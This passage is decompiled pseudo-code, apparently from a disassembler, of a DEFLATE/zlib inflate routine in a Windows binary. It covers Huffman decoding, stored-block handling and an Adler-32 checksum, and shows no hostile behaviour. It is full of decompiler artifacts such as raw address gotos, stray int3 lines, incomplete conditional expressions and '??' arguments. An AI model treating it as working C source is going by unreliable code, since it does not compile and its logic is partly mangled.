				void* _t890;
				signed int _t893;
				signed char _t894;
				intOrPtr _t896;
				intOrPtr _t898;
				void* _t901;
				signed char _t902;
				signed char _t903;
				void _t904;
				signed int _t908;
				signed char _t913;
				void* _t914;
				void* _t915;
				signed int _t918;
				void* _t923;
				signed int _t927;
				signed char _t931;
				signed int _t932;
				signed char _t935;
				signed int _t936;
				void* _t944;
				signed int _t959;
				unsigned int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t969;
				signed int* _t970;
				signed char* _t975;
				void* _t976;
				void* _t981;
				signed int _t982;
				signed int _t983;
				signed int _t986;
				signed int _t987;
				signed int _t989;
				signed int _t991;
				signed int _t992;
				signed int _t995;
				signed int _t999;
				signed int _t1005;
				signed int _t1006;
				int _t1007;
				int _t1009;
				signed int _t1010;
				unsigned int _t1013;
				void* _t1017;
				intOrPtr _t1018;
				signed char _t1019;
				void _t1022;
				void* _t1024;
				signed int _t1025;
				void* _t1027;
				int _t1032;
				signed int _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1038;
				void* _t1040;
				signed int _t1042;
				signed int _t1043;
				unsigned int _t1045;
				signed int _t1046;
				unsigned int _t1048;
				signed int _t1049;
				signed char _t1057;
				void* _t1058;
				void* _t1060;
				void* _t1061;

				L0:
				while(1) {
					L0:
					_t1043 = __esi;
					_t1022 = __edi;
					_t841 = __ebx;
					_t596 = memset(__edi + 0x1b80, 0, ??);
					_t962 =  *(_t1058 - 4);
					_t1061 = _t1060 + 0xc;
					while(1) {
						L135:
						 *(_t1058 - 8) = _t893;
						__eflags = _t893 -  *((intOrPtr*)(_t1022 + 0x34));
						if(_t893 >=  *((intOrPtr*)(_t1022 + 0x34))) {
							break;
						}
						L136:
						__eflags = _t1043 - 3;
						if(_t1043 >= 3) {
							L139:
							_t927 = _t991 & 0x00000007;
							_t991 = _t991 >> 3;
							_t1043 = _t1043 - 3;
							 *(_t1058 - 4) = _t991;
							 *(_t1058 - 0x1c) = _t1043;
							_t596 =  *( *(_t1058 - 8) + 0x411a24) & 0x000000ff;
							 *(_t596 + _t1022 + 0x1b80) = _t927;
							_t893 =  *(_t1058 - 8) + 1;
							continue;
						} else {
							while(1) {
								L137:
								__eflags = _t841 -  *(_t1058 - 0x20);
								if(_t841 >=  *(_t1058 - 0x20)) {
									break;
								}
								L138:
								_t596 = ( *_t841 & 0x000000ff) << _t1043;
								_t841 = _t841 + 1;
								_t991 = _t991 | _t596;
								 *(_t1058 - 0x18) = _t841;
								_t1043 = _t1043 + 8;
								 *(_t1058 - 4) = _t991;
								__eflags = _t1043 - 3;
								if(_t1043 < 3) {
									continue;
								} else {
									goto L139;
								}
								goto L295;
							}
							L249:
							 *_t1022 = 0xe;
							L285:
							__eflags =  *(_t1058 + 0x18) & 0x00000002;
							L286:
							L287:
							_t597 =  !=  ? 1 : _t596;
							 *(_t1058 - 0xc) = _t597;
							__eflags = _t597 - 1;
							if(_t597 != 1) {
								L288:
								__eflags = _t597 - 0xfffffffc;
								if(_t597 != 0xfffffffc) {
									L289:
									L292:
									_t642 =  *(_t1058 - 0x3c);
									__eflags = _t841 - _t642;
									if(_t841 > _t642) {
										while(1) {
											L293:
											__eflags = _t1043 - 8;
											if(_t1043 < 8) {
												goto L295;
											}
											L294:
											_t841 = _t841 - 1;
											_t1043 = _t1043 - 8;
											__eflags = _t841 - _t642;
											if(_t841 > _t642) {
												continue;
											}
											goto L295;
										}
									}
								}
							}
						}
						L295:
						_t963 =  *(_t1058 - 4);
						L296:
						 *(_t1022 + 4) = _t1043;
						asm("bts ecx, esi");
						__eflags = _t1043 - 0x20;
						_t599 =  >=  ? 0 : 0;
						_t856 = 0 ^ _t599;
						__eflags = _t1043 - 0x40;
						_t600 =  >=  ? _t856 : _t599;
						 *(_t1022 + 0x20) =  *(_t1058 - 0x28);
						_t965 =  *(_t1058 - 0x10) -  *(_t1058 + 0x10);
						__eflags =  *(_t1058 + 0x18) & 0x00000009;
						 *(_t1022 + 0x24) =  *(_t1058 - 8);
						 *(_t1022 + 0x28) =  *(_t1058 - 0x38);
						 *((intOrPtr*)(_t1022 + 0x3c)) =  *((intOrPtr*)(_t1058 - 0x48));
						 *(_t1022 + 0x38) = _t856 - 0x00000001 & _t963;
						 *(_t1058 - 0x10) = _t965;
						 *((intOrPtr*)( *((intOrPtr*)(_t1058 + 8)))) = _t841 -  *(_t1058 - 0x3c);
						_t843 =  *(_t1058 - 0xc);
						 *( *(_t1058 + 0x14)) = _t965;
						if(( *(_t1058 + 0x18) & 0x00000009) != 0) {
							L297:
							__eflags = _t843;
							if(_t843 >= 0) {
								L298:
								_t1045 =  *(_t1022 + 0x1c);
								_t859 = _t1045 & 0x0000ffff;
								_t610 = (0x5e6ea9af * _t965 >> 0x20 >> 0xb) * 0x15b0;
								_t1046 = _t1045 >> 0x10;
								 *(_t1058 - 0x3c) = _t1046;
								_t969 =  *(_t1058 - 0x10) - _t610;
								__eflags =  *(_t1058 - 0x10);
								 *(_t1058 - 0x34) = _t969;
								if( *(_t1058 - 0x10) != 0) {
									L299:
									_t845 = _t969;
									do {
										L300:
										_t970 = 0;
										 *(_t1058 + 0x14) = 0;
										__eflags = _t845 - 7;
										if(_t845 > 7) {
											L301:
											goto 0x42149d;
											asm("int3");
											asm("int3");
											asm("int3");
											L302:
											_t1024 = _t1022 - _t610;
											__eflags = _t1024;
											do {
												L303:
												_t970 =  &(_t970[2]);
												_t861 = _t859 + ( *_t610 & 0x000000ff);
												_t862 = _t861 + ( *( *(_t1058 + 0x10) + 1) & 0x000000ff);
												_t863 = _t862 + ( *( *(_t1058 + 0x10) + 2) & 0x000000ff);
												_t864 = _t863 + ( *( *(_t1058 + 0x10) + 3) & 0x000000ff);
												_t865 = _t864 + ( *( *(_t1058 + 0x10) + 4) & 0x000000ff);
												_t866 = _t865 + ( *( *(_t1058 + 0x10) + 5) & 0x000000ff);
												_t867 = _t866 + ( *( *(_t1058 + 0x10) + 6) & 0x000000ff);
												_t859 = _t867 + ( *( *(_t1058 + 0x10) + 7) & 0x000000ff);
												_t640 =  *(_t1058 + 0x10) + 8;
												_t1046 = _t1046 + _t861 + _t862 + _t863 + _t864 + _t865 + _t866 + _t867 + _t859;
												 *(_t1058 + 0x10) = _t640;
												__eflags = _t1024 + _t640 - _t845;
												_t610 =  *(_t1058 + 0x10);
											} while (_t1024 + _t640 < _t845);
											 *(_t1058 + 0x14) = _t970;
											 *(_t1058 - 0x3c) = _t1046;
										}
										L305:
										_t1022 = 0;
										 *((intOrPtr*)(_t1058 + 8)) = 0;
										__eflags = _t970 - _t845;
										if(_t970 < _t845) {
											L306:
											__eflags = _t845 - _t970 - 2;
											if(_t845 - _t970 >= 2) {
												L307:
												_t620 =  *(_t1058 + 0x14);
												_t1049 =  *(_t1058 + 0x10);
												_t846 = 0;
												_t981 = (_t845 - _t620 - 2 >> 1) + 1;
												__eflags = _t981;
												 *(_t1058 + 0x14) = _t620 + _t981 * 2;
												do {
													L308:
													_t860 = _t859 + ( *_t1049 & 0x000000ff);
													_t623 =  *(_t1049 + 1) & 0x000000ff;
													_t1022 = _t1022 + _t860;
													_t1049 = _t1049 + 2;
													_t859 = _t860 + _t623;
													_t846 = _t846 + _t859;
													_t981 = _t981 - 1;
													__eflags = _t981;
												} while (_t981 != 0);
												_t970 =  *(_t1058 + 0x14);
												 *(_t1058 + 0x10) = _t1049;
												_t1046 =  *(_t1058 - 0x3c);
												 *((intOrPtr*)(_t1058 + 8)) = _t846;
												_t845 =  *(_t1058 - 0x34);
											}
											L310:
											__eflags = _t970 - _t845;
											if(_t970 < _t845) {
												_t975 =  *(_t1058 + 0x10);
												_t859 = _t859 + ( *_t975 & 0x000000ff);
												_t1046 = _t1046 + _t859;
												_t976 =  &(_t975[1]);
												__eflags = _t976;
												 *(_t1058 + 0x10) = _t976;
											}
											L312:
											_t610 =  *((intOrPtr*)(_t1058 + 8)) + _t1022;
											_t1046 = _t1046 + _t610;
											__eflags = _t1046;
										}
										L313:
										L314:
										_t859 = _t859 + (_t610 * _t859 >> 0x20 >> 0xf) * 0xffff000f;
										_t610 = (0x80078071 * _t1046 >> 0x20 >> 0xf) * 0xffff000f;
										_t1046 = _t1046 + _t610;
										_t586 = _t1058 - 0x10;
										 *_t586 =  *(_t1058 - 0x10) - _t845;
										__eflags =  *_t586;
										_t845 = 0x15b0;
										 *(_t1058 - 0x3c) = _t1046;
										 *(_t1058 - 0x34) = 0x15b0;
									} while ( *_t586 != 0);
									goto 0x4214c6;
									asm("int3");
								}
								L316:
								_t1048 = (_t1046 << 0x10) + _t859;
								 *(_t1022 + 0x1c) = _t1048;
								__eflags = _t843;
								if(_t843 == 0) {
									__eflags =  *(_t1058 + 0x18) & 0x00000001;
									if(( *(_t1058 + 0x18) & 0x00000001) != 0) {
										__eflags = _t1048 -  *(_t1022 + 0x10);
										_t843 =  !=  ? 0xfffffffe : _t843;
									}
								}
							}
						}
						L319:
						return _t843;
						L320:
					}
					L140:
					 *((intOrPtr*)(_t1022 + 0x34)) = 0x13;
					while(1) {
						L141:
						_t694 =  *(_t1022 + 0x18);
						__eflags = _t694;
						if(_t694 >= 0) {
							break;
						}
						L218:
						_t982 =  *(_t1058 - 4);
						while(1) {
							L39:
							_t879 =  *(_t1058 - 0x20) - _t841;
							__eflags = _t879 - 4;
							if(_t879 < 4) {
								goto L58;
							}
							L40:
							_t1022 =  *(_t1058 - 0x14);
							__eflags =  *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) - 2;
							if( *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1043 - 0xf;
								if(_t1043 < 0xf) {
									_t995 =  *(_t841 + 1) & 0x000000ff;
									_t879 = _t1043;
									_t722 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | (_t995 << 0x00000008 | _t722) << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
								}
								_t596 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t596;
								__eflags = _t596;
								if(_t596 < 0) {
									L45:
									goto 0x421333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t709 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t709 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L44:
									_t879 = _t596 >> 9;
								}
								L48:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 & 0x00000100;
								if((_t880 & 0x00000100) != 0) {
									L84:
									_t881 = _t880 & 0x000001ff;
									 *(_t1058 - 8) = _t881;
									__eflags = _t881 - 0x100;
									if(_t881 != 0x100) {
										L219:
										_t673 = _t881 * 4 - 0x404;
										_t868 =  *(_t673 + 0x411010);
										_t596 =  *(_t673 + 0x411a48);
										 *(_t1058 - 0x38) = _t868;
										 *(_t1058 - 8) = _t596;
										__eflags = _t868;
										if(_t868 == 0) {
											L225:
											__eflags = _t1043 - 0xf;
											if(_t1043 >= 0xf) {
												L3:
												_t655 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
												 *(_t1058 - 0x1c) = _t655;
												if(_t655 < 0) {
													L5:
													goto 0x4212ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t657 = _t962 >> _t868;
														_t868 = _t868 + 1;
														_t841 =  *((short*)(_t1022 + 0x1700 + ((_t657 & 0x00000001) +  !_t841) * 2));
														__eflags = _t841;
													} while (_t841 < 0);
													 *(_t1058 - 0x1c) = _t841;
													_t841 =  *(_t1058 - 0x18);
													_t660 =  *(_t1058 - 0x1c);
												} else {
													L4:
													_t868 = _t655 >> 9;
													_t660 = _t655 & 0x000001ff;
												}
												L9:
												_t982 = _t962 >> _t868;
												_t1043 = _t1043 - _t868;
												_t871 =  *(0x411090 + _t660 * 4);
												_t596 =  *(0x411110 + _t660 * 4);
												 *(_t1058 - 4) = _t982;
												 *(_t1058 - 0x38) = _t871;
												 *(_t1058 - 0x28) = _t596;
												if(_t871 == 0) {
													L15:
													_t873 =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 + 0xc));
													 *((intOrPtr*)(_t1058 - 0x48)) = _t873;
													if(_t596 <= _t873 || ( *(_t1058 + 0x18) & 0x00000004) == 0) {
														L17:
														_t1022 =  *(_t1058 - 0x14);
														_t876 = (_t873 - _t596 &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc));
														 *(_t1058 - 0xc) = _t876;
														_t662 =  >  ?  *(_t1058 - 0x10) : _t876;
														_t877 =  *(_t1058 - 8);
														_t663 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877;
														_t1075 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877 -  *((intOrPtr*)(_t1058 - 0x40));
														if(( >  ?  *(_t1058 - 0x10) : _t876) + _t877 <=  *((intOrPtr*)(_t1058 - 0x40))) {
															L21:
															__eflags = _t877 - 9;
															if(_t877 < 9) {
																L30:
																goto 0x4212f7;
																asm("int3");
																do {
																	L32:
																	_t877 = _t877 - 3;
																	 *_t1022 =  *_t982 & 0x000000ff;
																	 *((char*)(_t1022 + 1)) =  *(_t982 + 1) & 0x000000ff;
																	_t666 =  *(_t982 + 2) & 0x000000ff;
																	_t982 = _t982 + 3;
																	 *(_t1022 + 2) = _t666;
																	_t1022 = _t1022 + 3;
																	__eflags = _t877 - 2;
																} while (_t877 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t877 -  *(_t1058 - 0x28);
																if(_t877 >  *(_t1058 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1042 =  *(_t1058 - 0xc);
																	_t959 =  *(_t1058 - 0x10);
																	_t828 = (_t877 & 0xfffffff8) + _t1042;
																	 *(_t1058 - 0x24) = _t828;
																	_t1019 = _t828;
																	do {
																		L24:
																		 *_t959 =  *_t1042;
																		_t830 =  *((intOrPtr*)(_t1042 + 4));
																		_t1042 = _t1042 + 8;
																		 *((intOrPtr*)(_t959 + 4)) = _t830;
																		_t959 = _t959 + 8;
																		__eflags = _t1042 - _t1019;
																	} while (_t1042 < _t1019);
																	_t982 =  *(_t1058 - 4);
																	 *(_t1058 - 0x10) = _t959;
																	_t877 =  *(_t1058 - 8) & 0x00000007;
																	 *(_t1058 - 0xc) = _t1042;
																	_t1022 =  *(_t1058 - 0x14);
																	 *(_t1058 - 8) = _t877;
																	__eflags = _t877 - 3;
																	if(_t877 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t831 = _t877;
																_t877 = _t877 - 1;
																 *(_t1058 - 8) = _t877;
																if(_t831 == 0) {
																	goto L39;
																}
																L19:
																if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																	L238:
																	 *(_t1058 - 0xc) = 2;
																	 *_t1022 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																	 *((intOrPtr*)(_t1058 - 0x48)) =  *((intOrPtr*)(_t1058 - 0x48)) + 1;
																	 *( *(_t1058 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1058 - 0x48)) -  *(_t1058 - 0x28) &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc))));
																	_t982 =  *(_t1058 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t879 =  *(_t1058 - 0x20) - _t841;
																__eflags = _t879 - 4;
																if(_t879 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L270:
														_t684 = _t596 | 0xffffffff;
														 *_t1022 = 0x25;
														goto L291;
													}
												} else {
													L10:
													if(_t1043 >= _t871) {
														L13:
														_t1043 = _t1043 - _t871;
														_t839 = (_t596 << _t871) - 0x00000001 & _t982;
														_t982 = _t982 >> _t871;
														 *(_t1058 - 0x28) =  *(_t1058 - 0x28) + _t839;
														_t596 =  *(_t1058 - 0x28);
														 *(_t1058 - 4) = _t982;
														goto L15;
													} else {
														L11:
														while(_t841 <  *(_t1058 - 0x20)) {
															_t596 = ( *_t841 & 0x000000ff) << _t1043;
															_t841 = _t841 + 1;
															_t871 =  *(_t1058 - 0x38);
															_t982 = _t982 | _t596;
															_t1043 = _t1043 + 8;
															 *(_t1058 - 0x18) = _t841;
															 *(_t1058 - 4) = _t982;
															if(_t1043 < _t871) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														 *_t1022 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1058 - 0x20) - _t841 - 2;
												if( *(_t1058 - 0x20) - _t841 >= 2) {
													L237:
													_t983 =  *(_t841 + 1) & 0x000000ff;
													_t676 =  *_t841 & 0x000000ff;
													_t841 = _t841 + 2;
													_t1022 =  *(_t1058 - 0x14);
													_t868 = _t1043;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) =  *(_t1058 - 4) | _t983 << _t1043 + 0x00000008 | _t676 << _t868;
													_t1043 = _t1043 + 0x10;
													_t962 =  *(_t1058 - 4);
												} else {
													do {
														L227:
														_t596 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
														 *(_t1058 - 0x24) = _t596;
														__eflags = _t596;
														if(_t596 < 0) {
															L231:
															__eflags = _t1043 - 0xa;
															if(_t1043 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1058 - 0x1c) = _t868;
																while(1) {
																	L234:
																	_t868 =  *((short*)(_t1022 + 0x1700 + ((_t962 >> _t868 & 0x00000001) +  !( *(_t1058 - 0x24))) * 2));
																	_t652 =  *(_t1058 - 0x1c) + 1;
																	 *(_t1058 - 0x24) = _t868;
																	 *(_t1058 - 0x1c) = _t652;
																	__eflags = _t868;
																	if(_t868 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t596 = _t652 + 1;
																	__eflags = _t1043 - _t596;
																	if(_t1043 < _t596) {
																		goto L1;
																	} else {
																		L236:
																		_t868 =  *(_t1058 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t596 = _t596 >> 9;
															__eflags = _t596;
															if(_t596 == 0) {
																L1:
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L264:
																	 *_t1022 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t868 = _t1043;
														_t644 = ( *_t841 & 0x000000ff) << _t868;
														_t841 = _t841 + 1;
														_t962 = _t962 | _t644;
														 *(_t1058 - 0x18) = _t841;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 4) = _t962;
													} while (_t1043 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1043 - _t868;
											if(_t1043 >= _t868) {
												L223:
												L224:
												_t1043 = _t1043 - _t868;
												_t680 = (_t596 << _t868) - 0x00000001 & _t962;
												_t962 = _t962 >> _t868;
												_t456 = _t1058 - 8;
												 *_t456 =  *(_t1058 - 8) + _t680;
												__eflags =  *_t456;
												 *(_t1058 - 4) = _t962;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L222:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t868 =  *(_t1058 - 0x38);
													_t962 = _t962 | _t596;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - _t868;
													if(_t1043 < _t868) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1022 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1022 + 0x14) & 0x00000001;
											if(( *(_t1022 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1043 - 3;
											if(_t1043 >= 3) {
												L89:
												_t1043 = _t1043 - 3;
												_t693 = _t962 & 0x00000007;
												_t991 = _t962 >> 3;
												 *(_t1022 + 0x14) = _t693;
												_t596 = _t693 >> 1;
												__eflags = _t596;
												 *(_t1058 - 4) = _t991;
												 *(_t1058 - 0x1c) = _t1043;
												 *(_t1022 + 0x18) = _t596;
												if(_t596 != 0) {
													L124:
													__eflags = _t596 - 3;
													if(_t596 == 3) {
														L266:
														 *(_t1058 - 0xc) = 0xffffffff;
														 *_t1022 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t596 - 1;
														if(_t596 != 1) {
															L128:
															_t893 = 0;
															__eflags = 0;
															while(1) {
																L129:
																 *(_t1058 - 8) = _t893;
																__eflags = _t893 - 3;
																if(_t893 >= 3) {
																	break;
																}
																L130:
																_t596 =  *((char*)(_t893 + 0x411004));
																 *(_t1058 - 0x1c) = _t596;
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	L133:
																	_t1017 = _t1022 + _t893 * 4;
																	_t1036 =  *(_t1058 - 4);
																	 *(_t1017 + 0x2c) = (0x00000001 <<  *(_t1058 - 0x1c)) - 0x00000001 & _t1036;
																	_t804 =  *(_t1058 - 8);
																	_t931 =  *((char*)(_t804 + 0x411004));
																	_t1037 = _t1036 >> _t931;
																	_t1043 = _t1043 - _t931;
																	_t932 = _t804;
																	 *(_t1058 - 4) = _t1037;
																	 *(_t1058 - 0x1c) = _t1043;
																	_t596 =  *(0x411a38 + _t932 * 4);
																	 *(_t1017 + 0x2c) =  *(_t1017 + 0x2c) +  *(0x411a38 + _t932 * 4);
																	_t991 = _t1037;
																	_t1022 =  *(_t1058 - 0x14);
																	_t893 = _t932 + 1;
																	continue;
																} else {
																	while(1) {
																		L131:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L132:
																		_t806 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t893 =  *(_t1058 - 8);
																		_t991 = _t991 | _t806;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 0x18) = _t841;
																		 *(_t1058 - 4) = _t991;
																		_t596 =  *((char*)(_t893 + 0x411004));
																		 *(_t1058 - 0x1c) = _t596;
																		__eflags = _t1043 - _t596;
																		if(_t1043 < _t596) {
																			continue;
																		} else {
																			goto L133;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1022 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L134:
															goto L0;
														} else {
															L126:
															goto 0x4213af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t596 + 0x2c)) = 0x120;
															L127:
															_t808 = _t596 + 1 - 0x20;
															 *_t808 =  *_t808 + _t808;
															_t841 = _t841 + _t808;
															_t809 = _t808 + 1;
															 *_t809 =  *_t809 ^ _t809;
															 *_t809 = _t809 +  *_t809;
															 *0xde0 =  *0xde0 + _t809;
															memset(_t809, ??, ??);
															asm("movdqa xmm0, [0x411ae0]");
															_t1061 = _t1061 + 0xc;
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqu [edi+0x70], xmm0");
															asm("movdqu [edi+0x80], xmm0");
															asm("movdqu [edi+0x90], xmm0");
															asm("movdqu [edi+0xa0], xmm0");
															asm("movdqu [edi+0xb0], xmm0");
															asm("movdqu [edi+0xc0], xmm0");
															_t1038 = _t1022 + 0xd0;
															asm("movdqa xmm0, [0x411af0]");
															asm("movdqu [edi], xmm0");
															asm("movdqu [edi+0x10], xmm0");
															asm("movdqu [edi+0x20], xmm0");
															asm("movdqu [edi+0x30], xmm0");
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqa xmm0, [0x411ad0]");
															asm("movdqu [edi+0x70], xmm0");
															asm("movq [edi+0x80], xmm0");
															 *((intOrPtr*)(_t1038 + 0x88)) = 0x8080808;
															 *((intOrPtr*)(_t1038 + 0x8c)) = 0x8080808;
															_t1022 =  *(_t1058 - 0x14);
															goto L141;
														}
													}
												} else {
													L90:
													_t596 = _t1043 & 0x00000007;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														L93:
														_t935 = _t1043 & 0x00000007;
														_t962 = _t991 >> _t935;
														_t1043 = _t1043 - _t935;
														 *(_t1058 - 4) = _t962;
														_t936 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1058 - 8) = _t936;
															__eflags = _t936 - 4;
															if(_t936 >= 4) {
																break;
															}
															L95:
															__eflags = _t1043;
															if(_t1043 == 0) {
																L101:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L244:
																	 *_t1022 = 7;
																	goto L285;
																} else {
																	L102:
																	_t596 =  *_t841;
																	_t841 = _t841 + 1;
																	(_t1022 + 0x2920)[_t936] = _t596;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 0x18) = _t841;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1043 - 8;
																if(_t1043 >= 8) {
																	L100:
																	(_t1022 + 0x2920)[_t936] = _t962;
																	_t1043 = _t1043 - 8;
																	_t962 = _t962 >> 8;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 4) = _t962;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L98:
																		_t596 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t962 = _t962 | _t596;
																		 *(_t1058 - 0x18) = _t841;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 4) = _t962;
																		__eflags = _t1043 - 8;
																		if(_t1043 < 8) {
																			continue;
																		} else {
																			L99:
																			_t936 =  *(_t1058 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1022 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t596 =  *(_t1022 + 0x2922) & 0x000000ff;
														 *(_t1058 - 8) = ( *(_t1022 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1022 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1058 - 8) - ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff);
														if( *(_t1058 - 8) != ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff)) {
															L265:
															 *(_t1058 - 0xc) = 0xffffffff;
															 *_t1022 = 0x27;
															goto L292;
														} else {
															L104:
															_t944 =  *(_t1058 - 8);
															while(1) {
																L105:
																__eflags = _t944;
																if(_t944 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1043;
																if(_t1043 == 0) {
																	L113:
																	_t596 =  *(_t1058 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t944;
																		if(_t944 == 0) {
																			break;
																		}
																		L116:
																		_t1018 =  *((intOrPtr*)(_t1058 - 0x40));
																		__eflags = _t596 - _t1018;
																		if(_t596 < _t1018) {
																			L118:
																			_t596 =  *(_t1058 - 0x20);
																			__eflags = _t841 - _t596;
																			if(_t841 >= _t596) {
																				L247:
																				_t1022 =  *(_t1058 - 0x14);
																				 *_t1022 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t962 = _t1018 -  *(_t1058 - 0x10);
																				_t1040 = _t596 - _t841;
																				__eflags = _t962 - _t1040;
																				_t814 =  <  ? _t962 : _t1040;
																				__eflags = ( <  ? _t962 : _t1040) - _t944;
																				if(( <  ? _t962 : _t1040) >= _t944) {
																					_t1022 = _t944;
																				} else {
																					__eflags = _t962 - _t1040;
																					_t1022 =  <  ? _t962 : _t1040;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t841 = _t841 + _t1022;
																				_t596 =  *(_t1058 - 0x10) + _t1022;
																				_t1061 = _t1061 + 0xc;
																				 *(_t1058 - 0x18) = _t841;
																				_t944 =  *(_t1058 - 8) - _t1022;
																				 *(_t1058 - 0x10) = _t596;
																				 *(_t1058 - 8) = _t944;
																				continue;
																			}
																		} else {
																			L117:
																			_t1022 =  *(_t1058 - 0x14);
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x421388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1043 - 8;
																	if(_t1043 >= 8) {
																		L110:
																		_t596 = _t962 & 0x000000ff;
																		_t962 = _t962 >> 8;
																		_t1043 = _t1043 - 8;
																		 *(_t1058 - 0x28) = _t596;
																		 *(_t1058 - 4) = _t962;
																		L111:
																		__eflags =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 - 0x40));
																		_t1022 =  *(_t1058 - 0x14);
																		if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																			L246:
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 0x34;
																			goto L292;
																		} else {
																			L112:
